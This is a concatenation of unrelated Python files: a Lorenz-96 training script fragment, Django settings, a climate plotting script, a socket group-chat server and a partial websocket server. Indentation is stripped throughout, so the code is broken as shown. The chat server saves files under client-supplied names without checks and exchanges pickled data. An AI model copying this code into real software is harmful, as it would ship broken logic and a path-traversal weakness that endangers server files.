if epoch > 0 and l_e < min[0]:
min = [l_e, l_t, epoch+1]
unchange = 0
if myrank == 0:
state = {
'net': net.state_dict(),
'opt': optimizer.state_dict(),
'sch': scheduler.state_dict(),
'epoch': epoch,
'min': min,
'elapse': time.time() - start,
}
save(fname, state, loss_t, loss_e)
if (epoch+1)%(max_epoch/10) == 0 and myrank==0:
st = {
'net': net.state_dict(),
'opt': optimizer.state_dict(),
'sch': scheduler.state_dict(),
'epoch': epoch,
'min': min,
'elapse': time.time() - start,
}
save(fname+"_fin", st, loss_t, loss_e)
if l_e < min_tmp:
min_tmp = l_e
if (epoch+1)%nint2 == 0 or epoch == 0:
if myrank == 0:
print('[%d] lr: %.2e, training: %.6f, eval: %.6f (%.6f, %.6f)' % (epoch + 1, scheduler.get_last_lr()[0], l_t, l_e, min_tmp, min[0]), flush=True)
if min_tmp > min[0]:
unchange += 1
if ( epoch > 10000 and min_tmp > min[0] * 1.5 ) or unchange >= 20:
break
min_tmp = large
if myrank == 0:
state = {
'net': net.state_dict(),
'opt': optimizer.state_dict(),
'sch': scheduler.state_dict(),
'epoch': epoch,
'min': min,
'elapse': time.time() - start,
}
if (cp > 1) and ('elapse' in stat.keys()):
elapse = stat['elapse']
else:
elapse = 0
print("minimam loss: %.6f, %.6f, %d"%(min[0], min[1], min[2]))
print(f"elapsed time: %d sec"%(time.time() - start + elapse))
save(fname+"_fin", state, loss_t, loss_e)
def init_process(myrank, rank_size, k, nobs, nobs2, data_t, data_e, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin):
os.environ["MASTER_ADDR"] = "127.0.0.1"
port = batch_size_t + ndata_t + 10000
if init:
port += 1
if myrank==0:
print("port: ", port)
os.environ["MASTER_PORT"] = f"{port}"
#backend = "gloo"
backend = "nccl"
dist.init_process_group(backend, rank=myrank, world_size=rank_size)
training(myrank, rank_size, k, nobs, nobs2, data_t, data_e, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin)
dist.destroy_process_group()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("ndata", type=int)
parser.add_argument("batch_size", type=int)
parser.add_argument("init")
parser.add_argument("--nspin", type=int, default=100)
parser.add_argument("--checkpoint", type=int, default=1)
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-f", "--fix", action="store_true")
args = parser.parse_args()
ndata_t = args.ndata
batch_size_t = args.batch_size
init = args.init == "True"
nspin = args.nspin
cp = args.checkpoint
debug = args.debug
fix = args.fix
# args = sys.argv
# argn = len(args)
# if argn==0:
# print("Usage: train_10step.py [ndata] [batch_size] [init] [checkpoint] [-d]")
# exit()
# ndata_t = int(args[1]) if argn>1 else 100
# batch_size_t = int(args[2]) if argn>2 else ndata_t * nf
# init = args[3]=="True" if argn>3 else False
# cp = int(args[4]) if argn>4 else 1
# debug = args[5]=="-d" if argn>5 else False
#ndata_e = 1
ndata_e = 100
nt = 50
nt2 = 100
#nt2 = 200
int_obs = 5
nobs = int(nt/int_obs) + 1
nobs2 = int(nt2/int_obs) + 1
double = False
#double = True
np.random.seed(0)
import lorenz96
k = 40
f = 8.0
dt = 0.01
sigma = 1e-1
model = lorenz96.Lorenz96(k, f, dt)
x0 = model.init(f, 0.01)
#training data
print("prepare training data")
if double:
data_t = np.zeros([ndata_t,nobs2,k], dtype="float64")
else:
data_t = np.zeros([ndata_t,nobs2,k], dtype="float32")
for m in range(ndata_t):
x = x0 + np.random.randn(k) * sigma
# spinup
for n in range(nspin):
x = model.forward(x)
data_t[m,0,:] = x
for n in range(nt2):
x = model.forward(x)
if (n+1)%int_obs == 0:
data_t[m,(n+1)//int_obs,:] = x
# evaluation data
print("prepare evaluation data")
if double:
data_e = np.zeros([ndata_e,nobs2,k], dtype="float64")
else:
data_e = np.zeros([ndata_e,nobs2,k], dtype="float32")
for m in range(ndata_e):
x = x0 + np.random.randn(k) * sigma
# spinup
for n in range(nspin):
x = model.forward(x)
data_e[m,0,:] = x
for n in range(nt2):
x = model.forward(x)
if (n+1)%int_obs == 0:
data_e[m,(n+1)//int_obs,:] = x
rank_size = torch.cuda.device_count()
if rank_size == 1:
data_t = DataSet(data_t, ndata_t, nobs, nobs2, k)
data_e = DataSet(data_e, ndata_e, nobs, nobs2, k)
training(0, 1, k, nobs, nobs2, data_t, data_e, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin)
else:
if ndata_t % rank_size > 0:
print("ndata_t % rank_size is not 0: ", ndata_t, rank_size)
exit()
if ndata_e % rank_size > 0:
print("ndata_e % rank_size is not 0: ", ndata_e, rank_size)
exit()
if batch_size_t % rank_size > 0:
print("batch_size_t % rank_size is not 0: ", batch_size_t, rank_size)
exit()
import torch.multiprocessing as mp
processes = []
lt = ndata_t // rank_size
le = ndata_e // rank_size
mp.set_start_method("spawn")
for myrank in range(rank_size):
data_ts = DataSet(data_t[lt*myrank:lt*(myrank+1)], lt, nobs, nobs2, k)
data_es = DataSet(data_e[le*myrank:le*(myrank+1)], le, nobs, nobs2, k)
p = mp.Process(target=init_process, args=(myrank, rank_size, k, nobs, nobs2, data_ts, data_es, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin))
p.start()
processes.append(p)
for p in processes:
p.join()
|
settings_20210906111200.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
def sayHi():
print("Hi")
schedule.every().day.at("11:12").do(sayHi)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
plot_from_pp_geop_height_tcwv_and_wind_mean_state_diff.py
|
"""
Load pp, plot and save
8km difference
"""
import os, sys
#%matplotlib inline
#%pylab inline
import matplotlib
#matplotlib.use('Agg')
# Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
import scipy.interpolate
import pdb
def main():
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
model_name_convert_legend = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_legend.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file_contourf = 'tcwv_mean'
pp_file_contour ='408_on_p_levs_mean'
plot_diag='TCWV'
#plot_diags=['sp_hum']
cb_label='mm'
min_contour=-5.
max_contour=5.
tick_interval=1.
plot_levels = [925]
#experiment_ids = ['dkmbq', 'dklyu']
experiment_ids = ['djzny', 'djznw', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#Experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkbhu', 'djznu', 'dkhgu' ] # All 12
#experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklwu', 'dklzq', 'dkbhu',] # All 12
#experiment_ids = ['dkbhu', 'dkjxq']
#experiment_ids = ['dkmbq', 'dklyu', 'djznw', 'djzny', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#experiment_ids = ['dklyu, dkmgw']
experiment_ids = ['dklyu']
#experiment_ids = ['dklyu']
diff_id='dkmbq'
#min_contour = 0
#max_contour = 3
#tick_interval=0.3
clevs = np.linspace(min_contour, max_contour,16)
#cmap=cm.s3pcpn_l
cmap = plt.cm.RdBu
#ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
pp_file_path = '/nfs/a90/eepdw/Data/EMBRACE/'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
from iris.coord_categorisation import add_categorised_coord
# def add_hour_of_day(cube, coord, name='hour'):
# add_categorised_coord(cube, name, coord,
# lambda coord, x: coord.units.num2date(x).hour)
figprops = dict(figsize=(8,8), dpi=100)
#cmap=cm.s3pcpn_l
un= unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
lon_high = 101.866
lon_low = 64.115
lat_high = 33.
lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
for p_level in plot_levels:
# Set pressure height contour min/max
if p_level == 925:
clev_min = -72.
clev_max = 72.
elif p_level == 850:
clev_min = -72.
clev_max = 72.
elif p_level == 700:
clev_min = -72.
clev_max = 72.
elif p_level == 500:
clev_min = -72.
clev_max = 72.
else:
print 'Contour min/max not set for this pressure level'
# Set potential temperature min/max
if p_level == 925:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 850:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 700:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 500:
clevpt_min = -3.
clevpt_max = 3.
else:
print 'Potential temperature min/max not set for this pressure level'
# Set specific humidity min/max
if p_level == 925:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 850:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 700:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 500:
clevsh_min = -0.0025
clevsh_max = 0.0025
else:
print 'Specific humidity min/max not set for this pressure level'
#clevs_col = np.arange(clev_min, clev_max)
clevs_lin = np.arange(clev_min, clev_max, 4.)
p_level_constraint = iris.Constraint(pressure=p_level)
#for plot_diag in plot_diags:
for experiment_id in experiment_ids:
expmin1 = experiment_id[:-1]
diffmin1 = diff_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s.pp' % (expmin1, experiment_id, experiment_id, pp_file_contourf)
pfile_diff = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s.pp' % (diffmin1, diff_id, diff_id, pp_file_contourf)
#pcube_contourf = iris.load_cube(pfile, p_level_constraint)
pcube_contourf = iris.load_cube(pfile)
#pcube_contourf=iris.analysis.maths.multiply(pcube_contourf,3600)
pcube_contourf_diff = iris.load_cube(pfile_diff)
#pcube_contourf_diff=iris.analysis.maths.multiply(pcube_contourf_diff,3600)
#pdb.set_trace()
height_pp_file = '%s_%s.pp' % (experiment_id, pp_file_contour)
height_pfile = '%s%s/%s/%s' % (pp_file_path, expmin1, experiment_id, height_pp_file)
height_pp_file_diff = '%s_%s.pp' % (diff_id, pp_file_contour)
height_pfile_diff = '%s%s/%s/%s' % (pp_file_path, diffmin1, diff_id, height_pp_file_diff)
pcube_contour = iris.load_cube(height_pfile, p_level_constraint)
pcube_contour_diff = iris.load_cube(height_pfile_diff, p_level_constraint)
#pdb.set_trace()
pcube_contourf=pcube_contourf-pcube_contourf_diff
pcube_contour=pcube_contour-pcube_contour_diff
del pcube_contourf_diff, pcube_contour_diff
#pdb.set_trace()
#time_coords = pcube_contourf.coord('time')
#iris.coord_categorisation.add_day_of_year(pcube_contourf, time_coords, name='day_of_year')
#time_coords = pcube_contour.coord('time')
#iris.coord_categorisation.add_day_of_year(pcube_contour, time_coords, name='day_of_year')
fu = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_30201_mean.pp' \
% (expmin1, experiment_id, experiment_id)
fu_diff = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_30201_mean.pp' \
% (diffmin1, diff_id, diff_id)
#pdb.set_trace()
u_wind,v_wind = iris.load(fu, p_level_constraint)
u_wind_diff,v_wind_diff = iris.load(fu_diff, p_level_constraint)
u_wind = u_wind - u_wind_diff
v_wind = v_wind - v_wind_diff
del u_wind_diff, v_wind_diff
for t, time_cube in enumerate(pcube_contourf.slices(['grid_latitude', 'grid_longitude'])):
#pdb.set_trace()
#height_cube_slice = pcube_contour.extract(iris.Constraint(day_of_year=time_cube.coord('day_of_year').points))
height_cube_slice = pcube_contour
u_wind_slice = u_wind
v_wind_slice = v_wind
#pdb.set_trace()
# Get time of averagesfor plot title
#h = un.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).strftime('%d%b')
#Convert to India time
# from_zone = tz.gettz('UTC')
# to_zone = tz.gettz('Asia/Kolkata')
# h_utc = un.num2date(np.array(time_cube.coord('day_of_year').points, dtype=float)[0]).replace(tzinfo=from_zone)
# h_local = h_utc.astimezone(to_zone).strftime('%H%M')
### Winds
cs_w = u_wind_slice.coord_system('CoordSystem')
lat_w = u_wind_slice.coord('grid_latitude').points
lon_w = u_wind_slice.coord('grid_longitude').points
lons_w, lats_w = np.meshgrid(lon_w, lat_w)
lons_w,lats_w = iris.analysis.cartography.unrotate_pole(lons_w,lats_w, cs_w.grid_north_pole_longitude, cs_w.grid_north_pole_latitude)
lon_w=lons_w[0]
lat_w=lats_w[:,0]
### Regrid winds to 2 degree spacing
lat_wind_1deg = np.arange(lat_low,lat_high, 2)
lon_wind_1deg = np.arange(lon_low,lon_high, 2)
#pdb.set_trace()
lons_wi, lats_wi = np.meshgrid(lon_wind_1deg, lat_wind_1deg)
fl_la_lo = (lats_w.flatten(),lons_w.flatten())
p_levs = u_wind_slice.coord('pressure').points
sc = np.searchsorted(p_levs, p_level)
u = scipy.interpolate.griddata(fl_la_lo, u_wind_slice.data.flatten(), (lats_wi, lons_wi), method='linear')
v = scipy.interpolate.griddata(fl_la_lo, v_wind_slice.data.flatten(), (lats_wi, lons_wi), method='linear')
################################### # PLOT ##############################################
fig = plt.figure(**figprops)
#cmap=plt.cm.RdBu_r
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
m =\
Basemap(llcrnrlon=lon_low,llcrnrlat=lat_low,urcrnrlon=lon_high,urcrnrlat=lat_high, rsphere = 6371229)
#pdb.set_trace()
# lat = pcube_contourf.coord('grid_latitude').points
# lon = pcube_contourf.coord('grid_longitude').points
# cs = cube.coord_system('CoordSystem')
# lons, lats = np.meshgrid(lon, lat)
# lons, lats = iris.analysis.cartography.unrotate_pole\
# (lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
# x,y = m(lons,lats)
#x_w,y_w = m(lons_wi, lats_wi)
if plot_diag=='temp':
min_contour = clevpt_min
max_contour = clevpt_max
cb_label='K'
main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), potential temperature (colours),\
and wind (vectors)'
tick_interval=2
clev_number=max_contour-min_contour+1
elif plot_diag=='sp_hum':
min_contour = clevsh_min
max_contour = clevsh_max
cb_label='kg/kg'
main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), specific humidity (colours),\
and wind (vectors)'
tick_interval=0.002
clev_number=max_contour-min_contour+0.001
lat = time_cube.coord('grid_latitude').points
lon = time_cube.coord('grid_longitude').points
lons, lats = np.meshgrid(lon, lat)
cs = time_cube.coord_system('CoordSystem')
lons,lats = iris.analysis.cartography.unrotate_pole(lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
cont = plt.contourf(lons, lats, time_cube.data*-0.01, clevs, cmap=cmap, extend='both')
#cont = plt.contourf(lons, lats, time_cube.data)
#pdb.set_trace()
cs_lin = plt.contour(lons, lats, height_cube_slice.data, clevs_lin,colors='#262626',linewidths=1.)
plt.clabel(cs_lin, fontsize=14, fmt='%d', color='black')
#del time_cube
#plt.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
x_w,y_w = m(lons_wi, lats_wi)
wind = m.quiver(x_w,y_w, u, v,scale=75, color='#262626' )
qk = plt.quiverkey(wind, 0.1, 0.1, 1, '1 m/s', labelpos='W')
cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
cbar.set_label('%s' % cb_label, fontsize=10, color='#262626')
# cbar.set_label(time_cube.units, fontsize=10, color='#262626')
cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
# cbar.ax.tick_params(labelsize=10, color='#262626')
#main_title='Mean Rainfall for EMBRACE Period -%s UTC (%s IST)' % (h, h_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
#file_save_name = '%s_%s_and_%s_%s_hPa_geop_height_and_wind' \
# % (experiment_id, pp_file_contour, pp_file_contourf, p_level)
file_save_name = '%s_minus_%s_%s_and_%s_%s_hPa_geop_height_and_wind' \
% (experiment_id, diff_id, pp_file_contour, pp_file_contourf, p_level)
save_dir = '%s%s/%s_and_%s' % (save_path, experiment_id, pp_file_contour, pp_file_contourf)
if not os.path.exists('%s' % save_dir): os.makedirs('%s' % (save_dir))
#plt.show()
plt.title('%s - %s minus %s' % (plot_diag, str(model_name_convert_legend.main(experiment_id)), str(model_name_convert_legend.main(diff_id))))
#plt.title('%s - %s' % (plot_diag, str(model_name_convert_legend.main(experiment_id))))
fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
#fig.savefig('%s/%s_short_title.png' % (save_dir, file_save_name) , format='png', bbox_inches='tight')
#plt.show()
#model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
#plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
#fig.savefig('%s/%s_%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
server.py
|
import socket
import threading
import pickle
import os
import sys
groups = {}
fileTransferCondition = threading.Condition()
class Group:
def __init__(self,admin,client):
self.admin = admin
self.clients = {}
self.offlineMessages = {}
self.allMembers = set()
self.onlineMembers = set()
self.joinRequests = set()
self.waitClients = {}
self.clients[admin] = client
self.allMembers.add(admin)
self.onlineMembers.add(admin)
def disconnect(self,username):
self.onlineMembers.remove(username)
del self.clients[username]
def connect(self,username,client):
self.onlineMembers.add(username)
self.clients[username] = client
def sendMessage(self,message,username):
for member in self.onlineMembers:
if member != username:
self.clients[member].send(bytes(username + ": " + message,"utf-8"))
def pyconChat(client, username, groupname):
while True:
msg = client.recv(1024).decode("utf-8")
if msg == "/viewRequests":
client.send(b"/viewRequests")
client.recv(1024).decode("utf-8")
if username == groups[groupname].admin:
client.send(b"/sendingData")
client.recv(1024)
client.send(pickle.dumps(groups[groupname].joinRequests))
else:
client.send(b"You're not an admin.")
elif msg == "/approveRequest":
client.send(b"/approveRequest")
client.recv(1024).decode("utf-8")
if username == groups[groupname].admin:
client.send(b"/proceed")
usernameToApprove = client.recv(1024).decode("utf-8")
if usernameToApprove in groups[groupname].joinRequests:
groups[groupname].joinRequests.remove(usernameToApprove)
groups[groupname].allMembers.add(usernameToApprove)
if usernameToApprove in groups[groupname].waitClients:
groups[groupname].waitClients[usernameToApprove].send(b"/accepted")
groups[groupname].connect(usernameToApprove,groups[groupname].waitClients[usernameToApprove])
del groups[groupname].waitClients[usernameToApprove]
print("Member Approved:",usernameToApprove,"| Group:",groupname)
client.send(b"User has been added to the group.")
else:
client.send(b"The user has not requested to join.")
else:
client.send(b"You're not an admin.")
elif msg == "/disconnect":
client.send(b"/disconnect")
client.recv(1024).decode("utf-8")
groups[groupname].disconnect(username)
print("User Disconnected:",username,"| Group:",groupname)
break
elif msg == "/messageSend":
client.send(b"/messageSend")
message = client.recv(1024).decode("utf-8")
groups[groupname].sendMessage(message,username)
elif msg == "/waitDisconnect":
client.send(b"/waitDisconnect")
del groups[groupname].waitClients[username]
print("Waiting Client:",username,"Disconnected")
break
elif msg == "/allMembers":
client.send(b"/allMembers")
client.recv(1024).decode("utf-8")
client.send(pickle.dumps(groups[groupname].allMembers))
elif msg == "/onlineMembers":
client.send(b"/onlineMembers")
client.recv(1024).decode("utf-8")
client.send(pickle.dumps(groups[groupname].onlineMembers))
elif msg == "/changeAdmin":
client.send(b"/changeAdmin")
client.recv(1024).decode("utf-8")
if username == groups[groupname].admin:
client.send(b"/proceed")
newAdminUsername = client.recv(1024).decode("utf-8")
if newAdminUsername in groups[groupname].allMembers:
groups[groupname].admin = newAdminUsername
print("New Admin:",newAdminUsername,"| Group:",groupname)
client.send(b"Your adminship is now transferred to the specified user.")
else:
client.send(b"The user is not a member of this group.")
else:
client.send(b"You're not an admin.")
elif msg == "/whoAdmin":
client.send(b"/whoAdmin")
groupname = client.recv(1024).decode("utf-8")
client.send(bytes("Admin: "+groups[groupname].admin,"utf-8"))
elif msg == "/kickMember":
client.send(b"/kickMember")
client.recv(1024).decode("utf-8")
if username == groups[groupname].admin:
client.send(b"/proceed")
usernameToKick = client.recv(1024).decode("utf-8")
if usernameToKick in groups[groupname].allMembers:
groups[groupname].allMembers.remove(usernameToKick)
if usernameToKick in groups[groupname].onlineMembers:
groups[groupname].clients[usernameToKick].send(b"/kicked")
groups[groupname].onlineMembers.remove(usernameToKick)
del groups[groupname].clients[usernameToKick]
print("User Removed:",usernameToKick,"| Group:",groupname)
client.send(b"The specified user is removed from the group.")
else:
client.send(b"The user is not a member of this group.")
else:
client.send(b"You're not an admin.")
elif msg == "/fileTransfer":
client.send(b"/fileTransfer")
filename = client.recv(1024).decode("utf-8")
if filename == "~error~":
continue
client.send(b"/sendFile")
remaining = int.from_bytes(client.recv(4),'big')
f = open(filename,"wb")
while remaining:
data = client.recv(min(remaining,4096))
remaining -= len(data)
f.write(data)
f.close()
print("File received:",filename,"| User:",username,"| Group:",groupname)
for member in groups[groupname].onlineMembers:
if member != username:
memberClient = groups[groupname].clients[member]
memberClient.send(b"/receiveFile")
with fileTransferCondition:
fileTransferCondition.wait()
memberClient.send(bytes(filename,"utf-8"))
with fileTransferCondition:
fileTransferCondition.wait()
with open(filename,'rb') as f:
data = f.read()
dataLen = len(data)
memberClient.send(dataLen.to_bytes(4,'big'))
memberClient.send(data)
client.send(bytes(filename+" successfully sent to all online group members.","utf-8"))
print("File sent",filename,"| Group: ",groupname)
os.remove(filename)
elif msg == "/sendFilename" or msg == "/sendFile":
with fileTransferCondition:
fileTransferCondition.notify()
else:
print("UNIDENTIFIED COMMAND:",msg)
def handshake(client):
username = client.recv(1024).decode("utf-8")
client.send(b"/sendGroupname")
groupname = client.recv(1024).decode("utf-8")
if groupname in groups:
if username in groups[groupname].allMembers:
groups[groupname].connect(username,client)
client.send(b"/ready")
print("User Connected:",username,"| Group:",groupname)
else:
groups[groupname].joinRequests.add(username)
groups[groupname].waitClients[username] = client
groups[groupname].sendMessage(username+" has requested to join the group.","PyconChat")
client.send(b"/wait")
print("Join Request:",username,"| Group:",groupname)
threading.Thread(target=pyconChat, args=(client, username, groupname,)).start()
else:
groups[groupname] = Group(username,client)
threading.Thread(target=pyconChat, args=(client, username, groupname,)).start()
client.send(b"/adminReady")
print("New Group:",groupname,"| Admin:",username)
def main():
if len(sys.argv) < 3:
print("USAGE: python server.py <IP> <Port>")
print("EXAMPLE: python server.py localhost 8000")
return
listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listenSocket.bind((sys.argv[1], int(sys.argv[2])))
listenSocket.listen(10)
print("PyconChat Server running")
while True:
client,_ = listenSocket.accept()
threading.Thread(target=handshake, args=(client,)).start()
if __name__ == "__main__":
main()
|
sockServer.py
|
import asyncio
import websockets
import json
import threading
from protocol import field, action, motor, power
class sockServer:
    '''Starts a websocket server, listens for connections, and facilitates automatic reading from and writing to connections
    Args:
        receiveEvent (function): called with the decoded JSON payload whenever a message is received
port (int): TCP port to open socket on
'''
def __init__(self, port, receiveEvent = None):
self.port = port
self.recEvent = receiveEvent
self.users = []
        self.loop = None
recT = threading.Thread(target = self.start, args=[port])
recT.start()
def start(self, port):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
try:
coro = websockets.server.serve(self.handle_conn, host='', port=port, loop=self.loop)
server = self.loop.run_until_complete(coro)
except OSError:
print("Socket OSError, closeing")
else:
self.loop.run_forever()
server.close()
self.loop.run_until_complete(server.wait_closed())
self.loop.close()
def send(self, data):
message = json.dumps(data)
for user in self.users:
asyncio.run_coroutine_threadsafe(user.send(message), self.loop)
async def handle_conn(self, conn, Uri):
print("URI: " + Uri)
user = client(conn, self.recEvent, self)
self.users.append(user)
await user.beginReceiveLoop()
class client:
def __init__(self, conn, recEvent, sockServ):
self.conn = conn
self.alive = True
self.recEvent = recEvent
self.sockServ = sockServ
async def beginReceiveLoop(self):
while self.alive:
try:
message = await self.conn.recv()
except websockets.exceptions.ConnectionClosed as e:
                self.destroy()
break
if message != "":
try:
data = json.loads(message)
self.recEvent(data)
except ValueError as e:
print("JSON LOAD ERROR: " + e)
async def send(self, data):
try:
print("Socket Send: " + data)
await self.conn.send(data)
except websockets.exceptions.ConnectionClosed as e:
